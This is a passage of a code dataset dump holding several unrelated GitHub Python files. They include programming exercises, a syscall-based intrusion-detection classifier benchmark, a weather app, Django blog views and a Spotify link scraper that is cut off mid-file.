\n\n","repo_name":"stkovacevic94/opencv-traffic-sign-detector","sub_path":"src/hog_classification.py","file_name":"hog_classification.py","file_ext":"py","file_size_in_byte":1443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41324696412","text":"# https://judge.softuni.org/Contests/Practice/Index/2302#2\n\n\ndef plunder(targets, town, n_people, gold_q):\n # If any of those two values (population or gold) reaches zero,\n # the town is disbanded.\n if targets[town][0] <= n_people:\n killed = targets[town][0]\n stolen_gold = gold_q\n if targets[town][1] <= gold_q:\n stolen_gold = targets[town][1]\n\n print(f\"{town} plundered! {stolen_gold} gold stolen, {killed} citizens killed.\")\n print(f\"{town} has been wiped off the map!\")\n targets.pop(town)\n return targets\n\n elif targets[town][1] <= gold_q:\n stolen_gold = targets[town][1]\n killed = n_people\n if targets[town][0] <= n_people:\n killed = targets[town][0]\n\n print(f\"{town} plundered! 
{stolen_gold} gold stolen, {killed} citizens killed.\")\n print(f\"{town} has been wiped off the map!\")\n targets.pop(town)\n return targets\n\n else:\n killed = n_people\n stolen_gold = gold_q\n targets[town][0] = targets[town][0] - n_people\n targets[town][1] = targets[town][1] - gold_q\n print(f\"{town} plundered! {stolen_gold} gold stolen, {killed} citizens killed.\")\n\n return targets\n\n\ndef prosper(targets, town, gold_q):\n targets[town][1] += gold_q\n print(f\"{gold_q} gold added to the city treasury. {town} now has {targets[town][1]} gold.\")\n return targets\n\n\ntargets = {} # {city: [population, gold]}\ncities_input = input().split('||')\n\nwhile cities_input[0] != 'Sail':\n\n city = cities_input[0]\n population = int(cities_input[1])\n gold = int(cities_input[2])\n if city not in targets:\n targets[city] = [population, gold]\n else:\n targets[city][0] += population\n targets[city][1] += gold\n cities_input = input().split('||')\n\nevents = input().split('=>') # Plunder {town: [n_people, gold_q]}\n # Prosper {town: gold_q}\nwhile events[0] != 'End':\n town = events[1]\n if events[0] == 'Plunder':\n n_people = int(events[2])\n gold_q = int(events[3])\n targets = plunder(targets, town, n_people, gold_q)\n elif events[0] == 'Prosper':\n gold_q = int(events[2])\n if gold_q > 0:\n targets = prosper(targets, town, gold_q)\n else:\n print(\"Gold added cannot be a negative number!\")\n events = input().split('=>')\n\ncounter = len(targets)\n\nif targets:\n print(f\"Ahoy, Captain! There are {counter} wealthy settlements to go to:\")\n for location in targets:\n print(f\"{location} -> Population: {targets[location][0]} citizens, Gold: {targets[location][1]} kg\")\n\nelse:\n print(\"Ahoy, Captain! All targets have been plundered and destroyed!\")\n","repo_name":"h-dmt/Python_Fundamentals","sub_path":"exam_sym/pirates.py","file_name":"pirates.py","file_ext":"py","file_size_in_byte":2735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21081071919","text":"import logging\nimport os\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\nlogging.getLogger('tensorflow').disabled = True\n\nfrom tradebot.environments.trade_environment import TradeEnvironment\nimport pandas as pd\nfrom datetime import datetime\nfrom stable_baselines.common.policies import MlpLstmPolicy\nfrom stable_baselines import PPO2\nfrom stable_baselines.common.vec_env import DummyVecEnv\n\n\ndef test_trade_environment():\n # Drop csv file in tests/data\n data = pd.read_csv(os.path.join(\n os.path.dirname(os.path.abspath(__file__)), '../data/btcusd.csv'))\n\n # print(data)\n data = data.drop(['time'], axis=1)\n n = len(data)\n split_point = int(n*.8)\n train = data.iloc[:split_point]\n test = data.iloc[split_point:]\n\n train_env = TradeEnvironment(train, transaction_fee=0.0026, episode_length=1000)\n train_env = DummyVecEnv([lambda: train_env])\n model = PPO2(MlpLstmPolicy, train_env, nminibatches=1)\n model.learn(total_timesteps=10000)\n\n test_env = TradeEnvironment(test, transaction_fee=0.0026, episode_length=1000)\n test_env = DummyVecEnv([lambda: test_env])\n obs = test_env.reset()\n done = False\n cum_rewards = 0\n while not done:\n action, _states = model.predict(obs)\n obs, reward, done, info = test_env.step(action)\n print(obs, reward)\n cum_rewards += reward\n test_env.render()\n print(cum_rewards)\n\nif __name__ == '__main__':\n 
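An aside on the plunder function above: its two overlapping branches repeat the same prints and can be collapsed. The version below is an illustrative refactor of mine (not the original author's code) that preserves the observable behavior — damage is capped at what the town holds, and a town drained of people or gold is removed.

def plunder_compact(targets, town, n_people, gold_q):
    # Cap the damage at what the town actually has.
    killed = min(n_people, targets[town][0])
    stolen_gold = min(gold_q, targets[town][1])
    print(f"{town} plundered! {stolen_gold} gold stolen, {killed} citizens killed.")
    targets[town][0] -= killed
    targets[town][1] -= stolen_gold
    # A town with no people or no gold left is disbanded.
    if targets[town][0] <= 0 or targets[town][1] <= 0:
        print(f"{town} has been wiped off the map!")
        targets.pop(town)
    return targets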
test_trade_environment()","repo_name":"aquintero/CMBot","sub_path":"tradebot/tests/manual/test_trade_environment.py","file_name":"test_trade_environment.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13036043275","text":"#\n# Lab04Ejercicio1.py\n#\n# DESCRIPCION: Programa que lee los coeficientes de hasta que se introduzca el\n# valor cero, y los alamacena en un arreglo. Muestra el grado del polinomio y \n# luego escribe el polinomio en notación polinomial. El grado del polinomio no\n# puede ser mayor que un valor M dado inicialmente por el usuario. \n#\n# Autor: \n#\tManuel Faria\n\n# Variables:\n# M: int \t // ENTRADA: Grado máximo del polinomio.\n# A: array[0,M+1) // ENTRADA: Arreglo que contiene los coeficientes.\n\n# Valores Iniciales:\nM = int(input(\"Ingrese el grado máximo del polinomio: \"))\nA = [0]*(M+1)\n\n# Precondición:\nassert(M>=0)\n\n# Calculos:\n# Invariante y cota:\n# Cota: N - i\nassert(True)\n\nfor i in range(0,M+1):\n\tA[i]=int(input(\"Ingrese el valor del coeficiente C\" + str(i) + \": \"))\n\n\t# Invariante:\n\tassert(True)\n\nprint(\"Grado del polinomio:\" + str(M))\nprint(\"P(x)=\", end='')\n\n# Invariante y cota:\n# Cota: N - i\nassert(True)\n\nfor j in range(0,M+1):\n\tif A[j]!=0:\n\t\tprint(str(A[j]) + \"x^\" + str(j), end='')\n\t\tif j!=M and A[i]!=0:\n\t\t\tprint(\"+\", end='')\n\n\t# Invariante:\n\tassert(True)\n\nprint(\"\")\n\n# Postcondición:\nassert(True)\n","repo_name":"mfaria724/CI2691-lab-algoritmos-1","sub_path":"Laboratorio 04/Laboratorio/Lab04Ejercicio1.py","file_name":"Lab04Ejercicio1.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25276974357","text":"import urllib.request\nfrom rembg import remove\nfrom PIL import Image\n\nimport logging\nlogging.basicConfig(level = logging.INFO)\n\nPICUTRE_PATH_SRC = \"./dist/tmp.jpg\"\nPICTURE_PATH_DST = \"./dist/tmp-no-bg.jpg\"\nPICTURE_PATH_DST_WITH_TICKET = \"./dist/tmp-no-bg-ticket.jpg\"\n\nTICKET_ASSET_PATH = \"./assets/ticket.jpg\"\n\ndef download_picture(url):\n logging.info(f\"Downloading picture from {url}\")\n urllib.request.urlretrieve(url, PICUTRE_PATH_SRC)\n\n\ndef superpose_ticket_image():\n logging.info(\"Adding ticket image to picture\")\n bg = Image.open(PICTURE_PATH_DST).convert('RGBA')\n foreground = Image.open(TICKET_ASSET_PATH).convert('RGBA')\n\n foreground.thumbnail((300,300), Image.Resampling.LANCZOS)\n bg.paste(foreground, ( int(bg.width / 2 - 100), int(bg.height / 2 - 100) ), foreground)\n \n \n bg = bg.convert('RGB')\n bg.save(PICTURE_PATH_DST_WITH_TICKET)\n return bg\n\n\ndef proccess_image():\n logging.info(f\"Removing background\")\n with open(PICUTRE_PATH_SRC, 'rb') as i:\n with open(PICTURE_PATH_DST, 'wb') as o:\n t = i.read()\n output = remove(t)\n o.write(output)\n logging.info(\"Background removed\")\n \n superpose_ticket_image()\n ","repo_name":"sylvainSUPINTERNET/product-generator-lotby","sub_path":"service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":1210,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"6711021981","text":"from itertools import islice\nfrom syscalls import syscalls\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.ensemble import RandomForestClassifier\n# from sklearn.svm import LinearSVC\n# from 
sklearn.svm import SVC\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.svm import OneClassSVM\nfrom sklearn.ensemble import IsolationForest\nfrom sklearn.ensemble import AdaBoostClassifier\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import f1_score\nfrom sklearn.metrics import recall_score\nfrom sklearn.metrics import precision_score\nfrom sklearn.metrics import accuracy_score\n\nimport numpy as np\n\nimport argparse\nimport os\n\nWINDOW_SIZE = 0\nN_NEIGHBORS = 3\n\nLABEL_MULT_NORMAL = 0\nLABEL_MULT_ANORMAL = 1\n\nLABEL_ONE_NORMAL = 1\nLABEL_ONE_ANORMAL = -1\n\nRUNS = 10\n\nFILES_PATH = os.path.join(os.path.dirname(os.path.realpath(__file__)), \"wordpress\", \"{v}\", \"{b}\")\n\n\ndef sliding_window_filter(input_file):\n it = iter(input_file)\n result = ()\n for elem in it:\n if (elem.startswith(\"---\")):\n elem = elem.split(\" \")[1]\n if (\"threat\" in syscalls[elem.split(\"(\")[0]]):\n if (syscalls[elem.split(\"(\")[0]][\"threat\"] != 4):\n result = result + (syscalls[elem.split(\"(\")[0]][\"id\"],)\n else:\n raise Exception(f\"Threat para {elem.split('(')[0]} não encontrada\")\n if len(result) == WINDOW_SIZE:\n yield result\n break\n for elem in it:\n if (elem.startswith(\"---\")):\n elem = elem.split(\" \")[1]\n if (\"threat\" in syscalls[elem.split(\"(\")[0]]):\n if (syscalls[elem.split(\"(\")[0]][\"threat\"] != 4):\n result = result[1:] + (syscalls[elem.split(\"(\")[0]][\"id\"],)\n yield result\n else:\n raise Exception(f\"Threat para {elem.split('(')[0]} não encontrada\")\n\n\ndef sliding_window_raw(seq):\n it = iter(seq)\n result = tuple(syscalls[line.split(\" \")[1] if line.startswith(\"---\") else line.split(\"(\")[0]][\"id\"] for line in islice(it, WINDOW_SIZE))\n if len(result) == WINDOW_SIZE:\n yield result\n for elem in it:\n if (elem.startswith(\"---\")):\n elem = elem.split(\" \")[1]\n result = result[1:] + (syscalls[elem.split(\"(\")[0]][\"id\"],)\n yield result\n\n\ndef retrieve_dataset(filename, filter):\n\n with open(filename, \"r\") as input_file:\n if filter == \"raw\":\n dataset = list(sliding_window_raw(input_file))\n else:\n dataset = list(sliding_window_filter(input_file))\n\n return dataset\n\n\ndef define_labels(base_normal, base_exec, multi):\n labels = []\n\n label_normal = LABEL_MULT_NORMAL if multi else LABEL_ONE_NORMAL\n label_anormal = LABEL_MULT_ANORMAL if multi else LABEL_ONE_ANORMAL\n\n for window in base_normal:\n labels.append(label_normal)\n\n for window in base_exec:\n labels.append(label_anormal)\n\n return labels\n\n\ndef get_features(version, filter=\"raw\"):\n\n path = FILES_PATH.format(v=version, b=\"normal\")\n base_normal = []\n base_exec = []\n\n for file in os.listdir(path):\n base_normal.extend(retrieve_dataset(os.path.join(path, file), filter))\n\n path = FILES_PATH.format(v=version, b=\"exec\")\n\n for file_exec in os.listdir(path):\n base_exec.extend(retrieve_dataset(os.path.join(path, file_exec), filter))\n\n return base_normal, base_exec\n\n\ndef naive_bayes(base_normal, base_exec):\n\n print(\"\\n> Naive Bayes\")\n\n results = []\n\n print(\"[...] 
Retrieving datasets and labels\")\n labels = define_labels(base_normal, base_exec, True)\n features = base_normal + base_exec\n\n for i in range(RUNS):\n X_train, X_test, y_train, y_test = train_test_split(features, labels, test_size=0.5, random_state=2**i)\n\n gnb = GaussianNB()\n gnb.fit(X_train, y_train)\n y_pred = gnb.predict(X_test)\n\n score = (precision_score(y_test, y_pred, average=\"binary\"), recall_score(y_test, y_pred, average=\"binary\"), f1_score(y_test, y_pred, average=\"binary\"), accuracy_score(y_test, y_pred))\n results.append(list(score))\n\n results = np.mean(results, axis=0)\n\n print(\"precision_score:\", results[0])\n print(\"recall_score:\", results[1])\n print(\"f1_score:\", results[2])\n print(\"accuracy_score:\", results[3])\n print(\"\")\n\n return\n\n\ndef kneighbors(base_normal, base_exec):\n\n print(\"\\n> K-Nearest Neighbors\")\n\n results = []\n\n print(\"N_NEIGHBORS\", str(N_NEIGHBORS))\n\n print(\"[...] Retrieving datasets and labels\")\n labels = define_labels(base_normal, base_exec, True)\n features = base_normal + base_exec\n\n for i in range(RUNS):\n X_train, X_test, y_train, y_test = train_test_split(features, labels, test_size=0.5, random_state=2**i)\n\n knn = KNeighborsClassifier(n_neighbors=N_NEIGHBORS, n_jobs=-1)\n knn.fit(X_train, y_train)\n y_pred = knn.predict(X_test)\n\n score = (precision_score(y_test, y_pred, average=\"binary\"), recall_score(y_test, y_pred, average=\"binary\"), f1_score(y_test, y_pred, average=\"binary\"), accuracy_score(y_test, y_pred))\n results.append(list(score))\n\n results = np.mean(results, axis=0)\n\n print(\"precision_score:\", results[0])\n print(\"recall_score:\", results[1])\n print(\"f1_score:\", results[2])\n print(\"accuracy_score:\", results[3])\n print(\"\")\n\n return\n\n\ndef random_forest(base_normal, base_exec):\n\n print(\"\\n> Random Forest\")\n\n results = []\n\n print(\"[...] Retrieving datasets and labels\")\n labels = define_labels(base_normal, base_exec, True)\n features = base_normal + base_exec\n\n for i in range(RUNS):\n X_train, X_test, y_train, y_test = train_test_split(features, labels, test_size=0.5, random_state=2**i)\n\n rfc = RandomForestClassifier(n_estimators=100, n_jobs=-1)\n\n rfc.fit(X_train, y_train)\n y_pred = rfc.predict(X_test)\n\n score = (precision_score(y_test, y_pred, average=\"binary\"), recall_score(y_test, y_pred, average=\"binary\"), f1_score(y_test, y_pred, average=\"binary\"), accuracy_score(y_test, y_pred))\n results.append(list(score))\n\n results = np.mean(results, axis=0)\n\n print(\"precision_score:\", results[0])\n print(\"recall_score:\", results[1])\n print(\"f1_score:\", results[2])\n print(\"accuracy_score:\", results[3])\n print(\"\")\n\n return\n\n\ndef ada_boost(base_normal, base_exec):\n print(\"\\n> Ada Boost\")\n\n results = []\n\n print(\"[...] 
Retrieving datasets and labels\")\n labels = define_labels(base_normal, base_exec, True)\n features = base_normal + base_exec\n\n for i in range(RUNS):\n X_train, X_test, y_train, y_test = train_test_split(features, labels, test_size=0.5, random_state=2**i)\n\n abc = AdaBoostClassifier(base_estimator=RandomForestClassifier(n_jobs=-1))\n abc.fit(X_train, y_train)\n y_pred = abc.predict(X_test)\n\n score = (precision_score(y_test, y_pred, average=\"binary\"), recall_score(y_test, y_pred, average=\"binary\"), f1_score(y_test, y_pred, average=\"binary\"), accuracy_score(y_test, y_pred))\n results.append(list(score))\n\n results = np.mean(results, axis=0)\n\n print(\"precision_score:\", results[0])\n print(\"recall_score:\", results[1])\n print(\"f1_score:\", results[2])\n print(\"accuracy_score:\", results[3])\n print(\"\")\n\n return\n\n\ndef multilayer_perceptron(base_normal, base_exec):\n print(\"\\n> Multilayer Perceptron\")\n\n results = []\n\n print(\"[...] Retrieving datasets and labels\")\n labels = define_labels(base_normal, base_exec, True)\n features = base_normal + base_exec\n\n for i in range(RUNS):\n X_train, X_test, y_train, y_test = train_test_split(features, labels, test_size=0.5, random_state=2**i)\n\n mlp = MLPClassifier()\n mlp.fit(X_train, y_train)\n y_pred = mlp.predict(X_test)\n\n score = (precision_score(y_test, y_pred, average=\"binary\"), recall_score(y_test, y_pred, average=\"binary\"), f1_score(y_test, y_pred, average=\"binary\"), accuracy_score(y_test, y_pred))\n results.append(list(score))\n\n results = np.mean(results, axis=0)\n\n print(\"precision_score:\", results[0])\n print(\"recall_score:\", results[1])\n print(\"f1_score:\", results[2])\n print(\"accuracy_score:\", results[3])\n print(\"\")\n\n return\n\n\n# def linear_svc():\n# print(\"\\n> Linear SVC\")\n#\n# print(\"\\n[...] Retrieving datasets and labels\")\n# features,labels = get_features_labels()\n#\n# X_train,X_test,y_train,y_test = train_test_split(features, labels, test_size=0.5, random_state=42)\n#\n# lsvc = SVC()\n#\n# lsvc.fit(X_train, y_train)\n# y_pred = lsvc.predict(X_test)\n#\n# print(\"\\nf1_score: \", f1_score(y_test, y_pred, average=\"binary\"))\n# print(\"\\nrecall_score: \", recall_score(y_test, y_pred, average=\"binary\"))\n# print(\"\\nprecision_score: \", precision_score(y_test, y_pred, average=\"binary\"))\n# print(\"\\n\")\n#\n# return lsvc\n\ndef one_class_svm(base_normal, base_exec):\n print(\"\\n> One Class SVM\")\n\n results = []\n\n print(\"[...] 
Retrieving datasets and labels\")\n labels = define_labels(base_normal, base_exec, False)\n features = base_normal + base_exec\n\n for i in range(RUNS):\n X_train, X_test, y_train, y_test = train_test_split(features, labels, test_size=0.5, random_state=2**i)\n\n onesvm = OneClassSVM(gamma=\"scale\", nu=0.01)\n trainX = []\n for x, y in zip(X_train, y_train):\n if (y == 1):\n trainX.append(x)\n\n onesvm.fit(trainX)\n y_pred = onesvm.predict(X_test)\n\n score = (precision_score(y_test, y_pred, average=\"binary\", pos_label=-1), recall_score(y_test, y_pred, average=\"binary\", pos_label=-1), f1_score(y_test, y_pred, average=\"binary\", pos_label=-1), accuracy_score(y_test, y_pred))\n results.append(list(score))\n\n results = np.mean(results, axis=0)\n\n print(\"precision_score:\", results[0])\n print(\"recall_score:\", results[1])\n print(\"f1_score:\", results[2])\n print(\"accuracy_score:\", results[3])\n print(\"\")\n\n return\n\n\ndef isolation_forest(base_normal, base_exec):\n\n print(\"\\n> Isolation Forest\")\n\n results = []\n\n print(\"[...] Retrieving datasets and labels\")\n labels = define_labels(base_normal, base_exec, False)\n features = base_normal + base_exec\n\n for i in range(RUNS):\n X_train, X_test, y_train, y_test = train_test_split(features, labels, test_size=0.5, random_state=2**i)\n\n clf = IsolationForest(n_jobs=-1)\n trainX = []\n for x, y in zip(X_train, y_train):\n if (y == 1):\n trainX.append(x)\n\n clf.fit(trainX)\n y_pred = clf.predict(X_test)\n\n score = (precision_score(y_test, y_pred, average=\"binary\", pos_label=-1), recall_score(y_test, y_pred, average=\"binary\", pos_label=-1), f1_score(y_test, y_pred, average=\"binary\", pos_label=-1), accuracy_score(y_test, y_pred))\n results.append(list(score))\n\n results = np.mean(results, axis=0)\n\n print(\"precision_score:\", results[0])\n print(\"recall_score:\", results[1])\n print(\"f1_score:\", results[2])\n print(\"accuracy_score:\", results[3])\n print(\"\")\n\n return\n\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument(\"window_size\", help=\"Window size\", type=int)\n parser.add_argument(\"-d\", \"--dataset\", help=\"Dataset version to use\", choices=[\"sbseg\", \"iscc\"], default=\"iscc\")\n parser.add_argument(\"-f\", \"--filter\", help=\"Filter mode\", choices=[\"raw\", \"filter\"], default=\"raw\")\n args = parser.parse_args()\n\n if args.window_size <= 0:\n raise argparse.ArgumentTypeError(\"window_size must be greater than 0\")\n\n WINDOW_SIZE = args.window_size\n\n print(\" \".join((\"\\n --- WINDOW_SIZE =\", str(WINDOW_SIZE), \"({}) --- \\n\".format(args.filter))))\n\n base_normal, base_exec = get_features(args.dataset, args.filter)\n\n naive_bayes(base_normal, base_exec)\n kneighbors(base_normal, base_exec)\n random_forest(base_normal, base_exec)\n multilayer_perceptron(base_normal, base_exec)\n ada_boost(base_normal, base_exec)\n\n one_class_svm(base_normal, base_exec)\n isolation_forest(base_normal, base_exec)\n","repo_name":"gabrielruschel/hids-docker","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12198,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"17265831470","text":"import tkinter as tk\nimport requests\nimport time\n#==============================#\ndef getweather(canvas):\n city=textfield.get()\n api=\"http://api.openweathermap.org/data/2.5/weather?q=\" + city + \"&appid=Keys\"\n 
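One more note on the HIDS record above: both sliding_window_raw and sliding_window_filter implement the same fixed-size window advanced one element at a time, which collections.deque with maxlen expresses more directly. A standalone sketch (names are mine, independent of the syscall table):

from collections import deque
from itertools import islice

def windows(seq, size):
    it = iter(seq)
    buf = deque(islice(it, size), maxlen=size)
    if len(buf) == size:
        yield tuple(buf)
    for item in it:
        buf.append(item)  # the deque drops the oldest element automatically
        yield tuple(buf)

assert list(windows([1, 2, 3, 4], 3)) == [(1, 2, 3), (2, 3, 4)]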
json_data=requests.get(api).json()\n    condition=json_data['weather'][0]['main']\n    temp=int(json_data['main']['temp'] - 273.15)\n    min_temp=int(json_data['main']['temp_min'] - 273.15)\n    max_temp=int(json_data['main']['temp_max'] - 273.15)\n    pressure=json_data['main']['pressure']\n    humidity=json_data['main']['humidity']\n    wind=json_data['wind']['speed']\n    sunrise=time.strftime(\"%I:%M:%S\" , time.gmtime(json_data['sys']['sunrise'] - 21600))\n    sunset=time.strftime(\"%I:%M:%S\" , time.gmtime(json_data['sys']['sunset'] - 21600))\n\n    final_info=condition+'\\n'+str(temp)+\"° C\"\n    final_data='\\n'+'Max Temp: '+str(max_temp)+'\\n'+'Min Temp: '+str(min_temp)+'\\n'+'Pressure: '+str(pressure)\\\n    +'\\n'+'Humidity: '+str(humidity)+'\\n'+'Wind speed: '+str(wind)+'\\n'+'Sunrise: '\\\n    +str(sunrise)+'\\n'+'Sunset: '+str(sunset)\n    label1.config(text = final_info)\n    label2.config(text = final_data)\n#==============================#\ncanvas = tk.Tk()\ncanvas.geometry('600x400') ; canvas.title(\"Weather\")\ntextfield = tk.Entry(canvas , font=(\"tahoma\",20)) ; textfield.pack(pady=20)\ntextfield.focus() ; textfield.bind('<Return>' , getweather)\nlabel1=tk.Label(canvas,font=(\"tahoma\",20)) ; label1.pack()\nlabel2=tk.Label(canvas,font=(\"tahoma\",15)) ; label2.pack()\ncanvas.mainloop()\n","repo_name":"Hidden0612/Weather-App-In-Python","sub_path":"Weather App In Python.py","file_name":"Weather App In Python.py","file_ext":"py","file_size_in_byte":1522,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"8212136038","text":"import os\nimport pandas as pd\nfrom lib import filedb\n\nbasedir = \"/media/nmurphy/BF_Data_Orange/datasets/new_strain_snaps1/\"\ncell_df = pd.read_hdf(os.path.join(basedir, \"single_cell_data.h5\"), \"cells\")\nfile_df = filedb.get_filedb(os.path.join(basedir, \"file_list.tsv\"))\n\n\ndef is_a_good_cell(v, mean = 10300, std = 3500):\n    if (v < mean + std) & (v > mean - std):\n        return True\n    else:\n        return False\n\ncell_df[\"good_cell\"] = cell_df[\"red_raw_mean\"].apply(is_a_good_cell)\ncell_df_filter = cell_df.loc[cell_df[\"good_cell\"], :]","repo_name":"npmurphy/biofilm_pulse","sub_path":"notebooks/sigb_histograms/load_63x_data.py","file_name":"load_63x_data.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22865410879","text":"while True:\n    import string\n\n    # LOWER PART\n    try:\n        size = int(input('Enter the amount of alphabets you want: '))\n\n        left_hand_side_length = size\n        width = ((size + (size - 1)) * 2) - 1\n        List = list(string.ascii_lowercase)\n        count = 1\n        counter = 0\n        sliced_list = (List[:size])\n        sliced_list.reverse()\n        reference_number = 1\n        referenced_number = 0\n\n        # UPPER PART\n\n        while reference_number != size:\n            new_list = (sliced_list[counter:referenced_number])\n            new_list.reverse()\n            Rangoli_pattern = (sliced_list[:reference_number] + new_list)\n            reference_number += 1\n            referenced_number += 1\n            print(('-'.join(Rangoli_pattern).center(width, '-')))\n\n        # LOWER PART\n\n        while size > 0:\n            new_list = (List[count:left_hand_side_length])\n            Rangoli_pattern = (sliced_list[:size] + new_list)\n            count += 1\n            size -= 1\n            print(('-'.join(Rangoli_pattern).center(width, '-')))\n        redo = input('Y/N:' )\n        if redo == 'y':\n            break\n        else:\n            continue\n    except ValueError:\n        print('not 
found')","repo_name":"Kehinde-Ajasa/SOLUTIONS_TO_CODING_CHALLENGES_ON_HACKERRANK","sub_path":"RAGNOLI.py","file_name":"RAGNOLI.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"22966250906","text":"def counting(A, m):\r\n n = len(A)\r\n count = [0] * (m + 1)\r\n for k in range(n):\r\n count[A[k]] += 1\r\n return count\r\n\r\n\r\ndef slow_solution(A, B, m):\r\n n = len(A)\r\n sum_a = sum(A)\r\n sum_b = sum(B)\r\n for i in range(n):\r\n for j in range(n):\r\n change = B[j] - A[i]\r\n sum_a += change\r\n sum_b -= change\r\n if sum_a == sum_b:\r\n return True\r\n sum_a -= change\r\n sum_b += change\r\n return False\r\n\r\n\r\ndef fast_solution(A, B, m):\r\n n = len(A)\r\n sum_a = sum(A)\r\n sum_b = sum(B)\r\n d = sum_b - sum_a\r\n if d % 2 == 1:\r\n return False\r\n d //= 2\r\n count = counting(A, m)\r\n for i in range(n):\r\n if 0 <= B[i] - d <= m and count[B[i] - d] > 0:\r\n return True\r\n return False\r\n\r\nv = [0, 0, 4, 2, 4, 5]\r\nres = counting(v, max(v))\r\ns = 0\r\nfor i, e in enumerate(res):\r\n s += i * e\r\n print(\"Count of\", i, \"=\", e)\r\nprint(s == sum(v))\r\n","repo_name":"totid/codility","sub_path":"lesson-2-countingelements.py","file_name":"lesson-2-countingelements.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23035652727","text":"import torch\nimport numpy as np\n\ndef preproc_state(state): # 资料预处理函数\n p_state = torch.from_numpy(state).unsqueeze(dim=0).float()\n p_state = torch.nn.functional.normalize(p_state,dim=1) # 将状态中的数值正规化至0-1之间\n return p_state\n\ndef get_action(dist,support): # 动作选择策略函数\n actions = []\n for b in range(dist.shape[0]): # 以回圈的形式批次走访分布维度上的资料\n expectations = [support @ dist[b,a:] for a in range(dist.shape[1])] # 计算每个动作价值分布的期望值\n action = int(np.argmax(expectations))\n actions.append(action)\n actions = torch.Tensor(actions).int()\n return actions\n","repo_name":"YingnanHan/Deep-Reinforcement-Learning-in-Action---Alexander-Zai","sub_path":"Chapter07 分散式DQN/11.对状态资料进行预处理,并决定选择动作策略.py","file_name":"11.对状态资料进行预处理,并决定选择动作策略.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"18287660334","text":"from django.shortcuts import render, get_object_or_404\nfrom django.utils import timezone\nfrom .models import Post, Categoria, SubCategoria, Countries\n\ndef viaje(request):\n\t# posts = Post.objects.filter(published_date__lte=timezone.now()).order_by('published_date')\n\tcountrySet = Countries.objects.all()\n\treturn render(request,'viaje.html',{'countrySet': countrySet})\t\n\ndef post_ver(request, pk):\n\tpost = get_object_or_404(Post, pk=pk)\n\n\tcontext = {\n\t\t'post': post\n\t}\n\treturn render(request,'posts_details.html',context)\n\n\n\ndef countryView(request, pk):\n\tcountry = get_object_or_404(Countries, pk=pk)\n\n\tif country.has_category:\n\t\tcategorySet = Categoria.objects.filter(country=country)\n\n\t\tcontext = {\n\t\t\t'categorySet': categorySet\n\t\t}\n\t\treturn render(request,'categories.html',context)\n\telse:\n\t\tpostSet = Post.objects.filter(country=country)\n\t\tcontext = {\n\t\t\t'postSet': postSet\n\t\t}\n\t\treturn render(request,'posts.html',context)\n\n\ndef categoryView(request, pk):\n\tcategoria = get_object_or_404(Categoria, pk=pk)\n\n\tif categoria.has_sub_category:\n\t\tsubCategoriaSet = 
SubCategoria.objects.filter(categoria=categoria)\n\n\t\tcontext = {\n\t\t\t'subCategoriaSet': subCategoriaSet\n\t\t}\n\t\treturn render(request,'subcategories.html',context)\n\telse:\n\t\tpostSet = Post.objects.filter(categoria=categoria)\n\t\tcontext = {\n\t\t\t'postSet': postSet\n\t\t}\n\t\treturn render(request,'posts.html',context)\n\n\ndef subCategoryView(request, pk):\n\tsubCategoria = get_object_or_404(SubCategoria, pk=pk)\n\n\tpostSet = Post.objects.filter(sub_categoria=subCategoria)\n\tcontext = {\n\t\t'postSet': postSet\n\t}\n\treturn render(request,'posts.html',context)","repo_name":"cristianjs19/viaje-blog","sub_path":"crea_post/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1600,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"69824385194","text":"from disk import diskset, diskqueue, pagequeue\nfrom aiohttp.client import ClientSession\nfrom collections import defaultdict\nfrom tqdm import tqdm\n\nimport argparse\nimport requests\nimport aiohttp\nimport asyncio\nimport time\nimport re\nimport os\n\ndomain = \"https://open.spotify.com/\"\n\npage_expr = re.compile(r'https://open\\.spotify\\.com/(?!(?:intl|oembed)\\b)([^\\s\"\\']+)^\\?')\nslug_expr = re.compile(r'/(track|album|artist|playlist|concert|episode|show|genre)/([0-9a-zA-Z]{22})')\nuser_expr = re.compile(r'/user/([0-9a-z]{28})')\n\nstatus_messages = {429: \"Too many requests\", 500: \"Internal Server Error\", 503: \"Service unavailable\", 504: \"Gateway timeout\"}\n\ndef parse_args():\n parser = argparse.ArgumentParser(description = \"Scrape Spotify\")\n parser.add_argument(\"--root\", default = \"run\", help = \"Root directory to store data\")\n args = parser.parse_args()\n return args\n\ndef process(url, html, code):\n try:\n if code == 200:\n pages = set(re.findall(page_expr, html))\n results = defaultdict(set)\n\n for slug, id in re.findall(slug_expr, html):\n results[slug].add(id)\n\n for id in 